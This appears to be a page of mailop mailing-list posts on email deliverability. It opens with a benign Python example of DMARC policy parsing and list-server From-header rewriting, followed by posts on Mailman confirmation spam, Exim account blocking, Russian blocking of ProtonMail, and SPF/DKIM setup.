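The two mail.ru messages above turn on one distinction: the list server's copy carries the list's own envelope-from (so SPF is evaluated against the list's domain and passes), while the `From:` header keeps the author's address; whether a receiver may act on that mismatch is exactly what the author domain's DMARC policy says, and `p=none` says "report, do not act". The groups.io behaviour mentioned earlier in the thread (rewrite `From:` only for authors under `p=reject`) follows directly. The added example below is my illustration of that decision logic, not groups.io's or mail.ru's code: it parses a DMARC record, derives the effective policy (`sp=` for subdomains), and produces the headers a list would put on its redistributed copy. The record strings, `tg@groups.example` and the author address are constructed.

```python
from email.utils import formataddr, parseaddr


def parse_dmarc(txt: str) -> dict:
    """Split a DMARC TXT record into its tag=value pairs (keys lower-cased)."""
    tags = {}
    for part in txt.split(";"):
        part = part.strip()
        if not part:
            continue
        key, _, value = part.partition("=")
        tags[key.strip().lower()] = value.strip()
    return tags


def effective_policy(dmarc_txt: str, is_subdomain: bool = False) -> str:
    """p= applies to the organizational domain itself; sp= (if present) to its subdomains."""
    tags = parse_dmarc(dmarc_txt)
    if tags.get("v", "").upper() != "DMARC1":
        return "none"                      # not a DMARC record at all
    if is_subdomain and "sp" in tags:
        return tags["sp"].lower()
    return tags.get("p", "none").lower()


def should_rewrite_from(dmarc_txt: str, is_subdomain: bool = False) -> bool:
    """A list only needs to rewrite From: when receivers would act on the author's policy."""
    return effective_policy(dmarc_txt, is_subdomain) in ("quarantine", "reject")


def headers_for_list_copy(author_from: str, dmarc_txt: str, list_address: str) -> dict:
    """Headers a list server puts on the copy it redistributes.

    The envelope-from is always the list's address, so SPF is checked against
    the list's domain; From: is kept unless the author's DMARC policy forces
    a rewrite, in which case the author is preserved in Reply-To.
    """
    name, addr = parseaddr(author_from)
    headers = {"Envelope-From": list_address}
    if should_rewrite_from(dmarc_txt):
        list_name = list_address.split("@", 1)[0]
        headers["From"] = formataddr((f"{name or addr} via {list_name}", list_address))
        headers["Reply-To"] = author_from
    else:
        headers["From"] = author_from
    return headers


if __name__ == "__main__":
    # Constructed records: a p=none domain like the yandex.ru one quoted above,
    # and a p=reject domain that does require rewriting.
    relaxed = "v=DMARC1; p=none; fo=1; rua=mailto:dmarc-reports@example.org"
    strict = "v=DMARC1; p=reject; sp=none"
    print(headers_for_list_copy("Alice <alice@example.org>", relaxed, "tg@groups.example"))
    print(headers_for_list_copy("Alice <alice@example.org>", strict, "tg@groups.example"))
```

A receiver that rejects the unrewritten copy despite `p=none` is substituting its own policy for the author domain's, which is the complaint in the thread; the example makes visible that nothing in the published record asks for that.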

Re: [mailop] Mailman confirmation email denial of service

2020-08-21 Thread Lena--- via mailop
> I have searched a few emails, but fail to see why they would be a
> target. Maybe only a few of them are the real targets, with other
> addresses being added in order to conceal those?

I suspect that the bot is spamming random web-forms
like various bots try to spam my guestbook with ads with links.
If a bot sees an "email" field then it fills it with a random email address.


___
mailop mailing list
mailop@mailop.org
https://chilli.nosignal.org/cgi-bin/mailman/listinfo/mailop


Re: [mailop] Ideas for possible content for FAQ: "Best Practices for running a mail server"

2020-02-17 Thread Lena--- via mailop
> Either links to existing material or specific stuff written for pages
> on would be welcome.

Blocking of compromised mail accounts (for Exim):
https://github.com/Exim/exim/wiki/BlockCracking




[mailop] Russian government blocks mail

2020-01-30 Thread Lena--- via mailop
Russian government blocked ProtonMail and SmartMail -
not only web-interfaces, but port 25 too.

[root@lena ~]# telnet mail.protonmail.ch 25
Trying 185.70.40.103...
telnet: connect to address 185.70.40.103: Connection refused

I'm moving my VPS outside Russia.

Talks about fake bomb threats are a lie, KGB (FSB) wants personal data.




Re: [mailop] Gmail marking email from me as spam

2019-10-14 Thread Lena--- via mailop
Two examples:

co.uk
bk.ru

They look similar, right?  But there are multiple domains under .co.uk
belonging to multiple different corporations, like under .com;
bk.ru belongs to a single corporation (which also owns mail.ru).
If a mailbox provider wants to spam-filter by domain, they have to use
a list of such multiple-corporation domains (what is the proper term?).
How might a mailbox provider know to include eu.org in that list?
Whois for eu.org doesn't offer a clue.




Re: [mailop] Admin: Gmail users of mailop suspended due to bounces.

2019-04-28 Thread Lena--- via mailop
> Another issue in that is the choice to send mail over IPv6. This has
> well-known risks of running into more draconian filtering than sticking
> with IPv4, and the operators of the mailing lists system have clearly
> NOT considered those risks or their mitigation.

> Mailing list managers should not assume anything about the 
> state of messages that come in.  Especially if there is a trivial action 
> that they can take to make sure that the message they send out does not 
> break something.

I receive digests from [mailop]. The header of the last digest has no DKIM.
The envelope-from is ,
and the mailop.org domain currently has no SPF.
With sending mail via IPv6, it's a recipe for disaster.

~ $ dig +short mailop.org txt
~ $

> In this case, said trivial action is removing / renaming the incoming 
> DKIM-Signature header.

And adding one for the mailop.org domain.

